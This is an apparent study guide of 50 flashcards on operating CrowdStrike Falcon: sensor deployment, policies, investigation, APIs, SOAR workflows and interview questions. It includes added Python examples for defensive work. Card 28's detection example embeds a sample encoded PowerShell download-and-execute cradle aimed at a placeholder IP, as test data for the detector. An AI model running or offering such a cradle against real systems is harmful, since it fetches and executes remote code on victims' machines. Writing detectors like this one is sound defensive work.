CrowdStrike Falcon Pocket Book

CrowdStrike Falcon Pocket Book — Uplatz

50 deep-dive flashcards • Wide layout • Fewer scrolls • 20+ Interview Q&A • Readable code examples

Section 1 — Fundamentals

1) What is CrowdStrike Falcon?

A cloud-native EDR/EPP platform delivering prevention, detection, response, threat intel, identity protection, and vulnerability insight via a lightweight sensor and cloud analytics.

# Components: Sensor (endpoint) + Cloud (Falcon) + Modules

2) Core Modules

Prevention (NGAV), EDR, Real Time Response (RTR), Threat Intelligence, Spotlight (vuln), Identity Protection, Cloud Security, Device Control, Firewall Mgmt, Sandbox.

# License bundles vary by org; enable per policy

3) How Falcon Works

Sensor observes telemetry (process, file, net, registry), applies ML/IOAs locally, streams to cloud for analytics, correlates with intel, and raises detections mapped to MITRE ATT&CK.

Telemetry → Analytics → Detections → Response

4) EPP vs EDR

EPP (NGAV) stops malware before or at execution using signatures, ML, and behavioral IOAs; EDR records what actually ran, surfaces detections, and provides the investigation/response tooling for whatever prevention missed. Use both for layered defense.

Prevent (NGAV) + Detect (EDR) + Respond (RTR)

5) Key Terms

IOA (behavioral pattern), IOC (static indicator: hash, IP, domain), Detection, Incident (correlated detections on one or more hosts), Policy, Containment, Host Group, FQL (filter syntax for API/console) and Event Search (raw telemetry queries).

Host → Policy → Sensor → Detections/Incidents

6) Deployment Models

SaaS console; sensors on Windows/macOS/Linux/Servers. Optional cloud and identity sensors for workloads and identity telemetry.

# Always validate OS support matrix before rollout

7) Data & Privacy

Telemetry is security-focused; configure data retention, region, and PII handling per policy. Use RBAC and audit logs.

# Governance: tag assets, restrict roles, review exports

8) Detections 101

Each detection carries a severity, MITRE tactic/technique, and evidence (process tree, command line, files, network). Response actions: contain host, kill process, quarantine file, open an RTR session, push to ticketing/webhook.

Status: New → In Progress → True Positive / False Positive / Ignored / Closed

9) Policies & Host Groups

Policies (prevention, sensor update, RTR, etc.) are defined per platform and assigned to host groups (static lists or dynamic rules on tags, OU, hostname). When a host belongs to several groups, the policy with the highest precedence wins, so order the policy list deliberately. Roll out in rings (pilot → broad).

Groups: "Pilot", "Prod-Servers", "HQ-Workstations"

10) Q&A — “Why Falcon vs legacy AV?”

Answer: Behavior-based IOAs, strong cloud analytics, instant telemetry, lightweight agent, integrated IR tooling, and ATT&CK mapping for faster investigations.

Section 2 — Sensors, Policies, Prevention & Detections

11) Sensor Install (Windows)

Deploy with your endpoint management tooling (SCCM/MECM, Intune, GPO). Pass the customer ID (CID, including its two-character checksum suffix) and confirm the host can reach the Falcon cloud. (Use the official docs for the exact switches for your sensor version.)

# PowerShell (simplified example; /norestart avoids an unplanned reboot)
Start-Process "WindowsSensor.exe" -ArgumentList "/install /quiet /norestart CID=XXXXXXXXXXXX-XX" -Wait
# Verify the sensor service is running afterwards (sc.exe, not the sc alias)
sc.exe query csagent

12) Sensor Install (macOS)

Deploy the .pkg via MDM, pushing the system extension approval (kext on older macOS versions), network filter, and PPPC/Full Disk Access profiles first so the user is never prompted and the sensor does not start in a degraded state.

# Jamf/MDM payloads for approvals + .pkg deployment

13) Sensor Install (Linux)

Packages are per distro (rpm/deb). Check the kernel against the support matrix: an unsupported kernel puts the sensor into Reduced Functionality Mode (RFM), where it stays registered but delivers limited telemetry and prevention. Allow outbound HTTPS (443) to the Falcon cloud endpoints for your region.

sudo dpkg -i falcon-sensor.deb            # or: sudo rpm -ivh falcon-sensor.rpm
sudo /opt/CrowdStrike/falconctl -s --cid=XXXXXXXXXXXX-XX
sudo systemctl start falcon-sensor

14) Verify Sensor Health

Confirm the host appears in Host Management, the sensor version is current, RFM state is false, telemetry is flowing, and the intended prevention policy is applied. Monitor the sensor health dashboards for stale or duplicate hosts.

# CLI (Linux): agent ID, CID, Reduced Functionality Mode state, version
sudo /opt/CrowdStrike/falconctl -g --aid --cid --rfm-state --version

15) Policy Rings

Start with “Detect” in a pilot group, observe, then graduate to “Prevent” where stable. Document exceptions, change control, and rollback.

Rings: Canary → EarlyAdopter → Broad

16) Prevention Tuning

Enable ML, script control, exploit mitigation, and ransomware protection per risk appetite. Use detection-only mode briefly during baselining.

# Keep logs; escalate blocklists gradually

17) Exclusions (Best Practice)

Narrow scope to signed, known paths. Avoid wildcards and user-writable dirs. Review regularly with audit evidence.

Include hash/publisher; avoid global */Temp/*
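The checks on this card, as an added example (not CrowdStrike code and not part of the original page): a small audit that flags exclusion requests before anyone submits them in the console. The exclusion records use a constructed, simplified shape (type/value/justification/review_by), not the Falcon API schema, and the list of user-writable roots is an assumption to extend for your environment.

```python
"""Audit candidate Falcon exclusions against the rules on the card above.

Added example, not CrowdStrike code. Records look like
{"type": "hash"|"publisher"|"path", "value": ..., "justification": ..., "review_by": ...};
this is a constructed shape for the example, not the Falcon API schema.
"""

# Roots a non-admin user can normally write into. Assumption for this example;
# extend with your own environment's paths (shares, build directories, ...).
USER_WRITABLE_ROOTS = (
    "c:/users/", "c:/programdata/", "c:/windows/temp/", "c:/temp/",
    "/tmp/", "/var/tmp/", "/home/", "/users/",
)


def _norm(path: str) -> str:
    """Lowercase with forward slashes so Windows and POSIX paths compare alike."""
    return path.strip().lower().replace("\\", "/")


def audit_exclusion(excl: dict) -> list:
    """Return findings for one exclusion; an empty list means it passes review."""
    findings = []
    if not excl.get("justification"):
        findings.append("no justification/ticket recorded")
    if not excl.get("review_by"):
        findings.append("no review date")

    kind = excl.get("type")
    if kind in ("hash", "publisher"):
        return findings                 # identity-based: the narrowest form there is
    if kind != "path":
        return findings + [f"unknown exclusion type {kind!r}"]

    p = _norm(excl.get("value", ""))
    if not p:
        return findings + ["empty path"]
    if p.strip("*/") == "":
        return findings + ["excludes everything"]
    if p.startswith("*"):
        findings.append("leading wildcard: matches any location, including user-writable ones")
    for root in USER_WRITABLE_ROOTS:
        if p.startswith(root):
            findings.append(f"under user-writable root {root}")
            break
    if p.endswith(("/", "/*", "/**")):
        findings.append("excludes a whole directory; name the specific file")
    if p.count("*") >= 2:
        findings.append("multiple wildcards: scope is hard to reason about")
    return findings


def audit_all(exclusions: list) -> dict:
    """Map each failing exclusion's value to its findings (passing ones are omitted)."""
    return {e.get("value"): f for e in exclusions if (f := audit_exclusion(e))}


# Constructed candidates for review: the classic anti-pattern, a narrow path under
# a user-writable root, a hash, and a narrow path under Program Files.
CANDIDATES = [
    {"type": "path", "value": r"*\Temp\*"},
    {"type": "path", "value": r"C:\Users\*\AppData\Local\Vendor\agent.exe",
     "justification": "CHG-1042", "review_by": "2025-12-01"},
    {"type": "hash", "value": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
     "justification": "CHG-1042", "review_by": "2025-12-01"},
    {"type": "path", "value": r"C:\Program Files\Vendor\agent.exe",
     "justification": "CHG-1042", "review_by": "2025-12-01"},
]

if __name__ == "__main__":
    for value, findings in audit_all(CANDIDATES).items():
        print(value)
        for f in findings:
            print("  -", f)
```

Run it as a pre-commit step on the exclusion request file or as a periodic audit over an export of current exclusions; the point is that every path exclusion has to justify why a hash or publisher exclusion would not do.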

18) Containment & Quarantine

Network containment cuts all host traffic except to the Falcon cloud (plus any IP ranges on the containment allowlist in policy), so RTR and policy updates keep working while the attacker loses C2 and lateral movement. Quarantine moves a file so it cannot execute. Lifting containment or restoring a file should follow an approval workflow.

Actions: contain / lift_containment (device actions), quarantine / restore (files)

19) Detection Lifecycle

Triage → scope impact → validate evidence → respond (kill/contain) → eradicate (patch, creds) → recover → lessons. Link to incident tickets.

Owner, SLA, Notes, Linked Jira/SNOW

20) Q&A — “False Positives?”

Answer: Triage patterns, check hash reputation, verify behavior, and adjust policy or targeted exclusions. Never blanket exclude user-writable paths.

Section 3 — Investigation, RTR, Threat Hunting & Intel

21) Investigation View

Process tree, timeline, IOA triggers, file/network artifacts, users, registry, and command lines. Pivot on parent/child relationships.

Pivot: Process → Hash → Other Hosts

22) Falcon Query Language (FQL)

FQL is the filter syntax used by the API (filter= parameter) and console list filters: field:value pairs joined with + (AND) or , (OR), with comparison operators and bracketed lists. Raw telemetry (ProcessRollup2, NetworkConnectIP4, ...) is searched in Event Search, which has its own query language. Save queries for reuse and dashboards.

FQL: status:'new'+max_severity_displayname:['High','Critical']
Event Search (not FQL): #event_simpleName=ProcessRollup2 | CommandLine=/powershell/i

23) Real Time Response (RTR) Basics

Remote shell to an endpoint over the sensor channel, gated by RTR roles (read-only analyst, active responder, administrator) and fully audited. Common uses: collect triage artifacts, list processes and connections, pull files. Write actions (put, runscript, remove) need the higher roles and change control.

# Examples (read/collect oriented)
ls, cat, get, ps, netstat

24) Containment During RTR

Contain before invasive actions; maintain chain of custody. Export artifacts to a case folder with hashes.

# Hash every collected file for integrity

25) Spotlight (Vulnerability)

CVE visibility per host derived from installed software; prioritize by exploitability (Spotlight's ExPRT rating), internet exposure, and asset criticality rather than raw CVSS alone. Create remediation tickets and track closure.

Filters: CVSS, Vendor, App, Host Group

26) Identity Protection

Detects credential misuse, MFA fatigue, lateral movement paths, weak protocols. Integrate with IdP and DCs for signals.

Alerts: Kerberoasting, Pass-the-Hash, RDP anomalies

27) Threat Intelligence

Actor profiles, indicators, TTPs, and reports. Map detections to active actor tradecraft for prioritization.

IOC feeds → match against environment

28) Custom IOA & Detections

Define behavioral rules for your environment (e.g., restricted script interpreters). Test in detect-only, then enforce.

Rule: powershell.exe with base64 + network call
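The rule on this card, as an added example (not CrowdStrike's IOA engine, not the page's code): detection logic that pairs a powershell.exe launch carrying an -EncodedCommand payload with a network connection from the same process, run over constructed sample telemetry. Field names (event_simpleName, ImageFileName, CommandLine, TargetProcessId, ContextProcessId, RemoteAddressIP4, RemotePort) follow Falcon Event Search conventions; the events themselves are made up for the example.

```python
"""Custom IOA as code: encoded PowerShell that then talks to the network.

Added example, not CrowdStrike code. The sample events are constructed;
field names mirror Falcon telemetry so the logic translates to Event Search.
"""
import base64
import re

# powershell.exe accepts -e, -ec, -en, -enc and -EncodedCommand (case-insensitive);
# the argument is base64 of a UTF-16LE script.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script, or None if absent or not valid."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_powershell(image: str) -> bool:
    return image.replace("\\", "/").lower().rsplit("/", 1)[-1] in ("powershell.exe", "pwsh.exe")


def detect_encoded_powershell_with_network(events: list) -> list:
    """Two-pass join: encoded PowerShell launches keyed by (aid, pid), then every
    network connection from one of those processes becomes a finding."""
    candidates = {}
    for ev in events:
        if ev["event_simpleName"] == "ProcessRollup2" and is_powershell(ev["ImageFileName"]):
            decoded = decode_encoded_command(ev["CommandLine"])
            if decoded is not None:
                candidates[(ev["aid"], ev["TargetProcessId"])] = decoded
    findings = []
    for ev in events:
        if ev["event_simpleName"] != "NetworkConnectIP4":
            continue
        key = (ev["aid"], ev["ContextProcessId"])
        if key in candidates:
            findings.append({
                "aid": key[0], "pid": key[1],
                "remote": f"{ev['RemoteAddressIP4']}:{ev['RemotePort']}",
                "decoded": candidates[key],
                "tactic": "Execution", "technique": "T1059.001",
            })
    return findings


def _enc(script: str) -> str:
    """Encode a script the way an attacker would for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed telemetry: one true positive (host-a), one benign script that also
# uses the network (host-b), one encoded command with no network activity (host-c).
SAMPLE_EVENTS = [
    {"event_simpleName": "ProcessRollup2", "aid": "host-a", "TargetProcessId": 4242,
     "ImageFileName": PS, "CommandLine": "powershell.exe -nop -w hidden -enc "
     + _enc("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')")},
    {"event_simpleName": "NetworkConnectIP4", "aid": "host-a", "ContextProcessId": 4242,
     "RemoteAddressIP4": "203.0.113.10", "RemotePort": 80},
    {"event_simpleName": "ProcessRollup2", "aid": "host-b", "TargetProcessId": 7,
     "ImageFileName": PS, "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"event_simpleName": "NetworkConnectIP4", "aid": "host-b", "ContextProcessId": 7,
     "RemoteAddressIP4": "10.0.0.5", "RemotePort": 445},
    {"event_simpleName": "ProcessRollup2", "aid": "host-c", "TargetProcessId": 9,
     "ImageFileName": PS, "CommandLine": "powershell.exe -EncodedCommand " + _enc("Get-Date")},
]

if __name__ == "__main__":
    for f in detect_encoded_powershell_with_network(SAMPLE_EVENTS):
        print(f"{f['aid']} pid={f['pid']} -> {f['remote']}: {f['decoded']!r}")
```

Test the same logic in detect-only against a week of real ProcessRollup2/NetworkConnectIP4 data before enforcing the console rule; the host-c case shows why the network leg matters, since encoded commands alone are common in legitimate management tooling.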

29) Watchlists & Dashboards

Track sensitive assets, privileged accounts, and crown jewels. Build dashboards for exec and SOC metrics.

KPIs: MTTD, MTTR, contain time, repeat offenders

30) Q&A — “Hunt vs Respond?”

Answer: Hunting is proactive—look for faint signals/TTPs; response is reactive—contain, eradicate, recover. Both feed each other via lessons learned.

Section 4 — Integrations, APIs, SIEM, Cloud & Automation

31) API Access

Create an API client (client ID/secret) with least-privilege scopes (for a SIEM feed, detections read only). Exchange it for a bearer token with the OAuth2 client-credentials flow; tokens last about 30 minutes, so cache and refresh rather than requesting one per call. Store the secret in a vault and rotate it regularly.

# OAuth2 token request (form-encoded body, not JSON)
POST https://api.crowdstrike.com/oauth2/token
Content-Type: application/x-www-form-urlencoded
client_id=<CLIENT_ID>&client_secret=<CLIENT_SECRET>

32) Sample API Call

Query detection IDs, then fetch their details, and pipe to SIEM or data lake. Use the base URL for your cloud region (api.crowdstrike.com for US-1; api.us-2.crowdstrike.com and api.eu-1.crowdstrike.com for the others), walk offset/limit pagination until meta.pagination.total is reached, and back off on HTTP 429 using the rate-limit headers in the response. The detections endpoint below is the legacy one; the Alerts API (/alerts/queries/alerts/v2) supersedes it.

curl -H "Authorization: Bearer <TOKEN>" \
  "https://api.crowdstrike.com/detections/queries/detections/v1?filter=status:'new'&limit=100"
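Cards 31 and 32 together, as an added example (not CrowdStrike's SDK and not the page's code): a minimal client that obtains the OAuth2 token, caches it, pages through a query endpoint and backs off on 429. The HTTP layer is injected so it runs offline against a constructed fake cloud; for real use, pass a function that performs the request with urllib or requests. Assumptions: the base URL is your region's; a 429 may carry an X-RateLimit-RetryAfter header, treated here as seconds to wait (confirm against the current API docs), with exponential backoff as the fallback; detection IDs and page sizes in the fake are made up.

```python
"""Minimal Falcon API client: token caching, pagination, 429 backoff.

Added example, not the FalconPy SDK. Transport is injected so it runs offline.
"""
import time
import urllib.parse
from dataclasses import dataclass, field


@dataclass
class Response:
    status: int
    body: dict
    headers: dict = field(default_factory=dict)


class FalconClient:
    def __init__(self, base_url, client_id, client_secret, transport, sleep=time.sleep):
        self.base_url = base_url.rstrip("/")
        self._id, self._secret = client_id, client_secret
        self._transport = transport     # callable(method, url, headers, body) -> Response
        self._sleep = sleep
        self._token, self._expires_at = None, 0.0

    def token(self):
        """Client-credentials grant; cached and refreshed a minute before expiry."""
        if self._token and time.time() < self._expires_at - 60:
            return self._token
        body = urllib.parse.urlencode({"client_id": self._id, "client_secret": self._secret})
        r = self._transport("POST", self.base_url + "/oauth2/token",
                            {"Content-Type": "application/x-www-form-urlencoded",
                             "Accept": "application/json"}, body)
        if r.status not in (200, 201):
            raise RuntimeError(f"token request failed: HTTP {r.status}")
        self._token = r.body["access_token"]
        self._expires_at = time.time() + r.body.get("expires_in", 1799)
        return self._token

    def get(self, path, params=None, max_retries=5):
        url = self.base_url + path + ("?" + urllib.parse.urlencode(params) if params else "")
        delay = 1.0
        for _ in range(max_retries + 1):
            headers = {"Authorization": f"Bearer {self.token()}", "Accept": "application/json"}
            r = self._transport("GET", url, headers, None)
            if r.status == 429:                       # rate limited: wait, then retry
                retry_after = r.headers.get("X-RateLimit-RetryAfter")  # assumed: seconds
                self._sleep(float(retry_after) if retry_after else delay)
                delay = min(delay * 2, 30.0)
                continue
            if r.status == 401:                       # token revoked early: refresh once
                self._token = None
                continue
            if r.status >= 400:
                raise RuntimeError(f"GET {path}: HTTP {r.status} {r.body.get('errors')}")
            return r.body
        raise RuntimeError(f"GET {path}: gave up after {max_retries} retries")

    def query_all(self, path, fql_filter, limit=500):
        """Return every resource ID matching the FQL filter, page by page."""
        ids, offset = [], 0
        while True:
            body = self.get(path, {"filter": fql_filter, "offset": offset, "limit": limit})
            page = body.get("resources", [])
            ids.extend(page)
            offset += len(page)
            if not page or offset >= body["meta"]["pagination"]["total"]:
                return ids


def new_high_or_critical_detection_ids(client):
    """The FQL from the query card: new detections at High or Critical severity."""
    return client.query_all("/detections/queries/detections/v1",
                            "status:'new'+max_severity_displayname:['High','Critical']", limit=3)


class FakeFalconCloud:
    """Constructed stand-in for the API: issues a token, throttles the first
    query once, then serves seven made-up detection IDs three per page."""
    def __init__(self):
        self.ids = [f"ldt:{'0' * 32}:{n}" for n in range(7)]
        self.calls, self.throttled = [], False

    def __call__(self, method, url, headers, body):
        self.calls.append((method, url))
        u = urllib.parse.urlparse(url)
        if method == "POST" and u.path == "/oauth2/token":
            if "client_secret=" not in (body or ""):
                return Response(400, {"errors": [{"message": "missing credentials"}]})
            return Response(201, {"access_token": "tok-123", "expires_in": 1799})
        if headers.get("Authorization") != "Bearer tok-123":
            return Response(401, {"errors": [{"message": "access denied"}]})
        if not self.throttled:
            self.throttled = True
            return Response(429, {"errors": [{"message": "rate limit exceeded"}]},
                            {"X-RateLimit-RetryAfter": "1"})
        q = urllib.parse.parse_qs(u.query)
        offset, limit = int(q["offset"][0]), int(q["limit"][0])
        total = len(self.ids)
        return Response(200, {"meta": {"pagination": {"offset": offset, "limit": limit, "total": total}},
                              "resources": self.ids[offset:offset + limit]})


if __name__ == "__main__":
    cloud = FakeFalconCloud()
    client = FalconClient("https://api.crowdstrike.com", "CLIENT_ID", "CLIENT_SECRET",
                          cloud, sleep=lambda s: print(f"throttled, sleeping {s}s"))
    print(new_high_or_critical_detection_ids(client))
```

The fake returns one 429 before the first page, so the run shows the backoff path as well as the happy path; with a real transport the same client needs only the regional base URL and vault-sourced credentials.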

33) Webhooks

Push new detections/incidents (via Falcon Fusion workflows or a poller) to SOAR or chat for instant triage. Authenticate the sender (shared secret or signature, whichever the sending side supports), reject replays, acknowledge quickly, and do the real work from a queue so a slow downstream system never drops an event.

POST /webhooks/falcon → enqueue → ack

34) SIEM Integrations

Splunk, Sentinel, QRadar, Elastic: pull or push detections, events, and audit logs. Normalize fields; map ATT&CK/TTP tags.

Parse → Enrich (host, user) → Index

35) SOAR Playbooks

Auto-contain critical-severity hosts, open tickets, notify owners, and request approval for quarantine. Maintain human-in-the-loop.

If severity ≥ High → Contain + Notify + Ticket
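Cards 33 and 35 together, as an added example (not Falcon's webhook format and not the page's code): a receiver that verifies a signature, drops replays, enqueues, and a consumer that applies the playbook rule above (severity ≥ High → contain + notify + ticket, with quarantine still needing approval). Everything about the message is an assumption constructed for the example: the sender signs the raw body with HMAC-SHA256 over a shared secret and sends the hex digest in an X-Signature-256 header, and the payload carries detection_id, severity and device_id. Check the Fusion workflow/webhook docs for what your tenant actually sends.

```python
"""Webhook receiver plus playbook decision for Falcon detections.

Added example, not CrowdStrike code. The signing scheme, header name and
payload fields are assumptions made for this example.
"""
import hashlib
import hmac
import json
from collections import deque

SEVERITY_RANK = {"Informational": 1, "Low": 2, "Medium": 3, "High": 4, "Critical": 5}


def sign(secret: bytes, body: bytes) -> str:
    return hmac.new(secret, body, hashlib.sha256).hexdigest()


def verify(secret: bytes, body: bytes, signature) -> bool:
    # Constant-time compare; a missing header compares against the empty string.
    return hmac.compare_digest(sign(secret, body), signature or "")


class WebhookReceiver:
    def __init__(self, secret: bytes):
        self.secret = secret
        self.queue = deque()      # work is done by a consumer, never in the request path
        self.seen = set()         # detection IDs already accepted (sender retries are normal)

    def receive(self, headers: dict, body: bytes):
        """Handle one HTTP POST; returns (status, message) for the response."""
        if not verify(self.secret, body, headers.get("X-Signature-256")):
            return 401, "bad signature"
        try:
            event = json.loads(body)
        except ValueError:
            return 400, "malformed json"
        det_id = event.get("detection_id")
        if not det_id or "severity" not in event or "device_id" not in event:
            return 400, "missing required fields"
        if det_id in self.seen:
            return 200, "duplicate ignored"
        self.seen.add(det_id)
        self.queue.append(event)
        return 202, "queued"


def plan_actions(event: dict) -> list:
    """Playbook: High/Critical -> contain host, notify owner, open ticket, and ask
    a human before quarantine; anything lower just gets a ticket."""
    if SEVERITY_RANK.get(event["severity"], 0) >= SEVERITY_RANK["High"]:
        return [f"contain:{event['device_id']}", "notify:asset-owner",
                "ticket:open", "approval:request-quarantine"]
    return ["ticket:open"]


def drain(receiver: WebhookReceiver) -> list:
    """Consumer side: pop queued events and decide the actions for each."""
    out = []
    while receiver.queue:
        ev = receiver.queue.popleft()
        out.append((ev["detection_id"], plan_actions(ev)))
    return out


# Constructed traffic: a critical detection delivered twice (sender retry),
# a low one, and a forged copy of the low one with a bad signature.
SECRET = b"rotate-me-regularly"


def _deliver(detection: dict):
    body = json.dumps(detection).encode()
    return {"X-Signature-256": sign(SECRET, body)}, body


def demo():
    rx = WebhookReceiver(SECRET)
    h1, b1 = _deliver({"detection_id": "ldt:a:1", "severity": "Critical", "device_id": "aid-1"})
    h2, b2 = _deliver({"detection_id": "ldt:b:2", "severity": "Low", "device_id": "aid-2"})
    responses = [rx.receive(h1, b1), rx.receive(h1, b1),
                 rx.receive(h2, b2), rx.receive({"X-Signature-256": "00"}, b2)]
    return responses, drain(rx)


if __name__ == "__main__":
    print(demo())
```

Containment is planned, not executed, inside the receiver: the consumer that drains the queue is where the device-action API call and the ticket creation live, which keeps the HTTP handler fast and lets a human veto the quarantine step.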

36) Cloud Security

Monitor cloud workloads/containers; detect runtime threats and misconfigurations. Feed findings back to engineering for hardening.

K8s signals + cloud logs → detections

37) Identity & Zero Trust

Correlate endpoint and identity signals; enforce step-up auth or isolate risky sessions. Reduce lateral movement paths.

Risk score → Conditional access policy

38) Data Lake Export

Stream telemetry/detections to storage (e.g., S3/ADLS) for long-term analytics. Partition by date/host for efficient queries.

path: /year=2025/month=08/day=26/

39) Reporting & KPIs

Exec summaries with trends, top TTPs, patch SLAs, mean time to contain, investigation backlog, false-positive rate.

Board: "Risk posture" + "IR velocity"

40) Q&A — “API Security?”

Answer: Least-privilege scopes, rotate secrets, IP-allowlist, signed webhooks, per-route quotas, and audit logs. Never embed keys in client apps.

Section 5 — Operations, Governance, Tuning & Interview Q&A

41) RBAC & Multi-Tenant

Separate roles for SOC Tier1/2, IR, admins, and auditors. Use host groups and sites/business units for scoping.

Principle: Least privilege + separation of duties

42) IR Runbooks

Document steps for malware, phishing, insider, and ransomware events: detect → contain → eradicate → recover → postmortem.

Include comms templates and legal/regulatory notification drafts

43) Patch & Vulnerability Flow

Spotlight → prioritize exploitable CVEs → ticket → deploy → verify. Track SLA by asset criticality and exposure.

SLA: Critical servers < 7 days

44) Performance & Stability

Keep sensors updated, monitor CPU/RAM impact, and test with app owners. Maintain an exemption review board.

Ring updates + A/B testing in pilot groups

45) Business Continuity

Plan for console unavailability or network isolation: the sensor keeps enforcing its last-synced prevention policy offline and uploads queued telemetry when connectivity returns; document offline triage procedures and escalation.

Runbooks: offline triage + later sync

46) Compliance Mapping

Map controls to ISO/NIST/PCI: malware protection, logging, incident response, vulnerability management, access control.

Evidence: policies, detections, tickets, reports

47) Tuning Cadence

Weekly: review new detections, false positives, and new software baselines. Monthly: rules refresh, dashboards, exclusions audit.

CAB approves high-impact policy changes

48) Production Checklist

  • Sensor coverage ≥ 98% endpoints
  • Policy rings + rollback plan
  • SIEM/SOAR integration live
  • IR runbooks tested quarterly
  • Backlog < SLA, KPIs trending down
  • Access reviews + audit logs

49) Common Pitfalls

Overbroad exclusions, stale sensors, no pilot ring, ignoring identity signals, lack of ticket linkage, and weak API protection.

Fix: governance + automation + metrics

50) Interview Q&A — 20 Practical Questions (Expanded)

1) Falcon value prop? Behavior-driven prevention + rich telemetry + fast IR.

2) IOA vs IOC? IOA = behavior/pattern; IOC = specific artifact (hash, IP, domain).

3) Policy rings? Pilot in detect, measure, then enforce prevent in phases.

4) Reduce false positives? Targeted exclusions, validate reputation, and monitor drift.

5) MITRE mapping? Detections carry tactic/technique for triage and reporting.

6) What’s RTR? Secure remote shell for triage/response with audit controls.

7) When to contain? Lateral movement risk or active C2; prioritize critical assets.

8) Spotlight prioritization? Exploitability, external exposure, business criticality.

9) Identity signals? Detect credential abuse, abnormal authentications, path risks.

10) SIEM integration? Centralize detections/telemetry, correlation, and retention.

11) Webhooks vs polling? Webhooks for near-real-time, polling for backfills.

12) API security? Rotate secrets, scope tokens, store in vault, IP allowlist.

13) Telemetry privacy? Limit PII, RBAC, logging, and data export governance.

14) Endpoint performance? Keep sensors current; test with heavy apps; monitor.

15) Custom IOA use? Enforce org-specific controls (e.g., block unsigned scripts).

16) KPI examples? MTTD/MTTR, contain time, patch SLA, repeat detections.

17) Ransomware response? Contain, snapshot/backup check, isolate shares, IR playbook.

18) Cloud workload? Enable runtime visibility; integrate with cloud logs.

19) Change management? CAB review, staged rollout, rollback tested.

20) Pitfall to avoid? Blanket exclusions and skipping post-incident lessons learned.